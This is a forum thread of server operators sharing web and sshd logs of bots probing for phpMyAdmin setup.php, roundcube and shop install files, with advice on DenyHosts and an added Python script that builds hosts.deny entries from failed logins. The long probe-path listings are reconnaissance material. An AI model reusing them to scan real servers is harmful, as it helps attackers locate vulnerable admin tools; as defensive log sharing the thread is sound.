It brings tears to my eyes
212.83.42.101, a regular visitor to my web server.
MyAdmin myadmin mysql phpMyAdmin phpmyadmin pma webdav geeklog/bbs/fckeditor/editor
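It hunts for these and various other folders, hitting whatever it can, and it also tries very hard to log in over ssh.
>>2 The IP is different every time, but they come to my server again and again looking for phpMyAdmin, pma and the like too.
There's a lot of phpMyAdmin. Everything else is nothing but robots.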
Feb 1 20:53:36 192 sshd[30181]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3)
Feb 1 21:50:22 192 sshd[30308]: refused connect from ::ffff:221.206.130.3 (::ffff:221.206.130.3)
Feb 1 23:10:01 192 sshd[30585]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24)
Feb 1 23:50:12 192 sshd[30654]: refused connect from ::ffff:61.163.56.24 (::ffff:61.163.56.24)
Feb 2 00:20:23 192 sshd[30768]: refused connect from ::ffff:60.12.11.62 (::ffff:60.12.11.62)
Feb 2 01:54:23 192 sshd[30957]: refused connect from ::ffff:128.226.170.170 (::ffff:128.226.170.170)
Feb 2 04:37:54 192 sshd[31317]: refused connect from ::ffff:202.205.176.115 (::ffff:202.205.176.115)
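When I changed the SSH port from 22 they stopped coming entirely, but when I put it back to 22 as a test they came again.
I guess they only go after hosts with 22 open.
I get a lot of phpMyAdmin-related stuff too.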
# cat /var/log/httpd/access_log | grep 110.172.52.5 | wc -l
951
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 228
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:00 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:01 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:02 +0900] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:03 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:04 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:05 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:06 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:07 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:08 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:09 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236
crawl-66-249-69-91.googlebot.com - - [03/Feb/2011:07:10:22 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232
You mean this kind of thing?
8 :
Anonymous (DNS unregistered): 2011/02/04 (Fri) 00:56:26 ID:2KVB2Qqc
This one is Attack No. 1, lol
FNAfb-09p2-253.ppp11.odn.ad.jp
91.121.243.113
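>7 Same as this. It sweeps through everything phpMyAdmin-related.
>2
For sshd, I recommend DenyHosts.
It automatically blocks the addresses that attack you.
Current state at my place: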
% egrep ^sshd /etc/hosts.deny | wc -l
1100
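The blocking idea recommended in the post above, as an added example that is not part of the thread and is not DenyHosts' own code: count failed sshd logins per source address and emit `sshd: <ip>` lines for /etc/hosts.deny once a threshold is reached. The log lines are constructed samples using documentation address ranges; the function names, the threshold of 3 and the allow-list parameter are assumptions made for illustration.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample in the syslog format written by OpenSSH's sshd.
# All addresses are from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
Feb  1 20:53:30 host sshd[30170]: Failed password for root from 203.0.113.7 port 40112 ssh2
Feb  1 20:53:32 host sshd[30170]: Failed password for root from 203.0.113.7 port 40112 ssh2
Feb  1 20:53:34 host sshd[30172]: Failed password for invalid user admin from 203.0.113.7 port 40120 ssh2
Feb  1 20:54:01 host sshd[30180]: Failed password for invalid user test from ::ffff:198.51.100.23 port 2211 ssh2
Feb  1 20:54:03 host sshd[30180]: Failed password for invalid user oracle from ::ffff:198.51.100.23 port 2211 ssh2
Feb  1 20:54:05 host sshd[30181]: Failed password for invalid user pma from 198.51.100.23 port 2250 ssh2
Feb  1 21:10:00 host sshd[30200]: Failed password for alice from 192.0.2.10 port 50000 ssh2
Feb  1 21:10:09 host sshd[30200]: Accepted password for alice from 192.0.2.10 port 50000 ssh2
Feb  1 21:15:00 host sshd[30210]: Failed password for invalid user x from 192.0.2.99 from 203.0.113.200 port 1 ssh2
Feb  1 21:20:00 host httpd[400]: Failed password for root from 203.0.113.7 port 1 ssh2
"""

# Anchor on the syslog prefix and on the END of the message. The user name is
# chosen by the remote side, so a name such as "x from 192.0.2.99" must not be
# able to nominate somebody else's address for blocking.
FAILED = re.compile(
    r"^\w{3} +\d+ [\d:]{8} \S+ sshd\[\d+\]: "
    r"Failed password for .* from (\S+) port \d+ ssh2$",
    re.MULTILINE,
)
DENY_LINE = re.compile(r"^sshd:\s*(\S+)", re.MULTILINE)


def normalize(raw):
    """Return the canonical address string, or None if raw is not an IP."""
    try:
        ip = ipaddress.ip_address(raw)
    except ValueError:
        return None
    # ::ffff:a.b.c.d (the form seen in "refused connect" lines) is a.b.c.d
    mapped = getattr(ip, "ipv4_mapped", None)
    return str(mapped or ip)


def failed_logins(log_text):
    """Count failed password attempts per source address."""
    counts = Counter()
    for match in FAILED.finditer(log_text):
        ip = normalize(match.group(1))
        if ip is not None:
            counts[ip] += 1
    return counts


def deny_entries(counts, threshold, allow=(), existing=""):
    """Return the new 'sshd: <ip>' lines to append to hosts.deny.

    allow    -- networks that must never be blocked (e.g. your own office)
    existing -- current hosts.deny content, so entries are not duplicated
    """
    allowed = [ipaddress.ip_network(net) for net in allow]
    blocked = {normalize(m.group(1)) for m in DENY_LINE.finditer(existing)}
    new = []
    for ip, hits in counts.items():
        addr = ipaddress.ip_address(ip)
        if hits < threshold or ip in blocked:
            continue
        if any(addr in net for net in allowed):
            continue
        new.append(addr)
    # Sort IPv4 before IPv6, then numerically, for a stable file layout
    new.sort(key=lambda a: (a.version, int(a)))
    return [f"sshd: {a}" for a in new]


if __name__ == "__main__":
    for line in deny_entries(failed_logins(SAMPLE_LOG), threshold=3):
        print(line)
```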
Doesn't Apache only write a log entry when there's a request?
[ASCII art with the speech bubble "Attack chance!!"]
Nothing but Google's bot comes to mine.
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /roundcubemail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /rc/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:46 +0900] "GET /webmail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /roundcube/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /mail/README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
61.19.255.14 - - [07/Feb/2011:03:59:47 +0900] "GET /README HTTP/1.1" 404 444 "-" "Morfeus strikes again."
Besides phpMyAdmin, this kind of thing has started showing up recently too.
What is this one trying to do?
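They're simply checking whether you have roundcube installed.
I've never used roundcube so I don't know, but doesn't it have security holes like phpMyAdmin does?
19 :
Anonymous (DNS unregistered): 2011/02/11 (Fri) 10:39:12 ID:MrqsjyYh
>>14 The exact same thing came to mine
The date and time were almost the same too
And there was also stuff like this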
67.205.111.77 (5rreo.com)
Date,Time,Method,URL,Query,HTTP,Status,Size,Referer,Keyword,Agent
2011/02/04,03:15:23,GET,"/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:24,GET,"/cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:25,GET,"/zen-cart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:25,GET,"/zencart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:26,GET,"/zen/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:27,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:27,GET,"/shop/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:28,GET,"/butik/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:28,GET,"/zcart/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:29,GET,"/catalog/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:29,GET,"/shop2/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:30,GET,"/boutique/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
2011/02/04,03:15:31,GET,"/store/install.txt","","1.1",403,3025,"-","","Toata dragostea mea pentru diavola"
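You probably just got picked up by some dumb-site searcher, lol. How stupid.
The IPs that have been kindly bombing my bulletin board at intervals of five minutes to several hours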
Today's porn-spam POSTs
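To the poster above:
For POST spam there are tons of tools that submit while rotating IPs,
so I think exposing them is pointless no matter how many you post.
With a tool you can earn about 500,000 a month, lol
Idiots should just drop dead.
>>26 Some of them do change IPs, but
223.132.1.24 shows up in my log more than 9,000 times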
220.105.173.3
p840118.tokynt01.ap.so-net.ne.jp
Even when it's painful, even when it's sad, is it all fine as long as you're inside a jail?
...sorry
91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:49:51 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
91.121.108.5 [22/Feb/2011:01:49:52 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:49:57 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:03 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:09 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:15 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:21 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
91.121.108.5 [22/Feb/2011:01:50:27 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:30 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:31 +0900] "GET /3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:37 +0900] "GET /PMA/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:43 +0900] "GET /PMA2005/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:52 +0900] "GET /SSLMySQLAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:44:58 +0900] "GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:04 +0900] "GET /admin/pma/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:10 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:16 +0900] "GET /bbs/data/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:22 +0900] "GET /cpadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:28 +0900] "GET /cpadmindb/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:34 +0900] "GET /cpanelmysql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:40 +0900] "GET /cpanelphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:46 +0900] "GET /cpanelsql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:52 +0900] "GET /cpdbadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:45:58 +0900] "GET /cpphpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:04 +0900] "GET /db/scripts/setup.php HTTP/1.1" 404 REF:-
33 :
Anonymous (DNS unregistered): 2011/02/22 (Tue) 21:56:13.08 ID:9vW0beJU
89.149.242.190 [22/Feb/2011:02:46:10 +0900] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:16 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:22 +0900] "GET /mysql-admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:28 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:34 +0900] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqlmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:41 +0900] "GET /p/m/a/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:35 +0900] "GET /mysqladminconfig/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:47 +0900] "GET /pMA/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:53 +0900] "GET /php-my-admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:46:59 +0900] "GET /php-myadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:05 +0900] "GET /phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:11 +0900] "GET /phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:17 +0900] "GET /phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:23 +0900] "GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:29 +0900] "GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:35 +0900] "GET /phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:41 +0900] "GET /phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:47 +0900] "GET /phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:53 +0900] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:47:59 +0900] "GET /phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:05 +0900] "GET /phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:11 +0900] "GET /phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:17 +0900] "GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:23 +0900] "GET /phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:29 +0900] "GET /phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:35 +0900] "GET /phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:39 +0900] "GET /phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:38 +0900] "GET /phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:45 +0900] "GET /phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:51 +0900] "GET /phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:48:57 +0900] "GET /phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:03 +0900] "GET /phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:09 +0900] "GET /phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:15 +0900] "GET /phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:21 +0900] "GET /phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:27 +0900] "GET /phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:33 +0900] "GET /phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:39 +0900] "GET /phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:45 +0900] "GET /phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:51 +0900] "GET /phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:49:57 +0900] "GET /phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:03 +0900] "GET /phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:09 +0900] "GET /phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:15 +0900] "GET /phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:21 +0900] "GET /phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:27 +0900] "GET /phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:33 +0900] "GET /phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:39 +0900] "GET /phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:43 +0900] "GET /phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:42 +0900] "GET /phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:49 +0900] "GET /phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:50:55 +0900] "GET /phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:01 +0900] "GET /phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:07 +0900] "GET /phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:13 +0900] "GET /phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:19 +0900] "GET /phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:25 +0900] "GET /phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:31 +0900] "GET /phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:37 +0900] "GET /phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:43 +0900] "GET /phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:49 +0900] "GET /phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:51:55 +0900] "GET /phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:01 +0900] "GET /phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:07 +0900] "GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:13 +0900] "GET /phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:19 +0900] "GET /phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:25 +0900] "GET /phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:31 +0900] "GET /phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:37 +0900] "GET /phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:43 +0900] "GET /phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:46 +0900] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:52 +0900] "GET /phpMyAdmin2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:52:58 +0900] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:04 +0900] "GET /phpmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:10 +0900] "GET /phpmy-admin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:16 +0900] "GET /phpmya/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:22 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:28 +0900] "GET /phpmyadmin1/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:34 +0900] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:40 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:46 +0900] "GET /pma2005/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:52 +0900] "GET /roundcube/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:53:58 +0900] "GET /scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:04 +0900] "GET /sl2/data/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:10 +0900] "GET /sqladmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:16 +0900] "GET /sqlmanager/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:22 +0900] "GET /sqlweb/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:28 +0900] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:34 +0900] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:40 +0900] "GET /web/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:46 +0900] "GET /webadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /webdb/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:50 +0900] "GET /websql/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:54:56 +0900] "GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
89.149.242.190 [22/Feb/2011:02:55:02 +0900] "GET /~/PMA/scripts/setup.php HTTP/1.1" 404 REF:-
